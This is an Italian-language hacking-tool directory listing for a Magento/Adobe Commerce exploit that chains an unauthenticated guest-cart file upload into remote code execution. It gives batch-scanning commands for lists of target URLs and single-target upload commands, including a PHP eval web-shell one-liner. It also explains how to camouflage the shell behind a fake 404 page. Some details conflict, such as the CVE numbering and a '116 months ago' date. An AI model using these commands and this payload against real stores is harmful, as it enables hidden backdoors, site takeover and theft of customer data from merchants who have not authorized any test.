Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-43990-Magento-RCE — Magento APSB25-94 Caricamento File Non Autenticato a RCE (CVE-2026-XXXX) - Eval Shell + Scanner di Probe | Kitploit
Strumenti/GitHubGitHub/amkkk221/cve-2025-43990-magento-rce
Scanner di Vulnerabilità WebGenerazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration Testing
GitHub
amkkk221/cve-2025-43990-magento-rce

CVE-2025-43990-Magento-RCE

Magento APSB25-94 Caricamento File Non Autenticato a RCE (CVE-2026-XXXX) - Eval Shell + Scanner di Probe

Vedi Repository
116 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Magento APSB25-94 — Caricamento file non autenticato a RCE

Panoramica

Sfrutta il caricamento di file non autenticato in Magento / Adobe Commerce tramite il caricamento di file custom_options del carrello ospite API REST.

Catena d'attacco

1. GraphQL → leak product SKU
2. REST API → create guest cart
3. REST API → upload PNG polyshell via custom_options file_info
4. HTTP GET → access .php at predictable path
5. PHP exec → RCE

Strumenti

magento_godzilla.py — Scanner Batch

Caricamento in due fasi: file di probe (sicuro dal WAF) + shell eval (mimetizzazione 404).

pip install requests
python magento_godzilla.py -f urls.txt -t 20 -o results.txt

Output: RCE_CONFIRMED, SHELL_KILLED, PROBE_ONLY

magento_upload.py — Upload su singolo target

python magento_upload.py -u https://target.com -f godzilla.php
python magento_upload.py -u https://target.com -c '<?php eval($_POST[1]);?>'
python magento_upload.py -u https://target.com -f shell.php --raw

Percorsi di upload

/pub/media/custom_options/quote/{c1}/{c2}/{filename}
/media/custom_options/quote/{c1}/{c2}/{filename}

Mimetizzazione shell

GET restituisce un falso 404 (HTTP 200 + corpo "Not Found"). POST con parametro password esegue codice.

Dichiarazione di non responsabilità

Solo per test di sicurezza autorizzati.

Scarica lo strumento